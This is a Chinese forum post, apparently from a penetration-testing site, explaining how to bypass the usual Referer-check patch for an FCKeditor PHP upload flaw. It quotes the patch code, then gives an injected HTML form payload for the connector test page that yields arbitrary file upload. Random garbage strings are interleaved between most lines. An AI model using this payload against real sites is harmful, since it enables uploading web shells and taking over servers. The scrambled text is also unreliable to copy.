中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
X- ]# ]2 \# H1 m2 V
网上给出的修复方案是
5 n/ X0 X- @# |7 c7 u
修复方法,删除FCK编辑器用其他的编辑器
: K( j7 m3 H; W4 T2 h0 H O- ?
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
1 m4 @ c- C6 I1 p1 @" g
在
4 x1 F. I# e+ [+ N4 `) t6 @9 e- K
require(‘config.php’);
3 _7 a% H; I; D# ]* l) H7 L8 e% _
require(‘util.php’);
% W. X9 _9 {) B6 @( ~. B H
的下面添加以下代码—————————–
, C7 H) A, b% u: `: z4 i* a
//防止外部提交
; |/ x' e- k* q8 `4 s" W
function outsidepost()
7 q/ O1 E- ~* Q2 d ]: z
{
+ U/ P/ m/ C9 U
$servername=$_SERVER['SERVER_NAME'];
# k7 _6 k. u' d' h+ [7 e3 [
$sub_from=@$_SERVER['HTTP_REFERER'];
' I7 W6 F! a0 W- R3 }- M
$sub_len=strlen($servername);
7 P+ [2 z) P6 J& g0 O; P3 `9 i
$checkfrom=substr($sub_from,7,$sub_len);
$ N* [' J% ^1 O n
if($checkfrom!=$servername){
' L! Y0 |: S- g8 k3 m4 K
echo(“you don’t outsidepost!”);
8 V7 _( \. v/ a) v6 S& s
exit;
' |. p4 B. z/ U. |
}
5 [) t+ p0 j( y) l( b) [3 i
}
5 d" P+ S' a; i+ D* L
outsidepost();
, ]* h+ o9 r8 k; y0 `/ _$ f
防止外部提交,但是没有防止内部提交,
1 Z$ V9 S1 b" }% i8 L y
利用方法:
, B; K5 n k7 F/ m
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
5 M1 a: ^; \ w& I, B" P0 F
2,在Current Folder 框输入
. T: f, a1 r) I
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
' L1 c! Y J5 {
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
# e# a; O; T) w2 |8 b
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2